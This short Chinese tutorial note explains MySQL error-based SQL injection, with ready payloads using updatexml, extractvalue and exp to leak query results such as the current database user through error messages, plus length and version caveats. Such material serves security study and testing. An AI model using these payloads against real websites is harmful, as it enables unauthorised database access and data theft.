当页面存在注入点并且回显报错信息时,我们就可以利用报错注入
updataxml报错注入:
该报错最多显示32位,若过超过32位,可以使用substr()进行分割
注入栗子:1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23
这是一个必定报错的语句,原因是16进制ascii 7e的字符为'~',对于xml来说这是非法字符
结果:
报错中带着我们的查询结果
extractvalue报错注入:
和上面方法原理差不多
栗子:1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
exp报错注入:
栗子:1 and exp(~(select * from(select user())a));
报错原因是exp产生的数值达到最大值,产生越界
这个报错方法在mysql>5.5.53的版本无法显示
还有很多报错的方法,不全部举例了
网友评论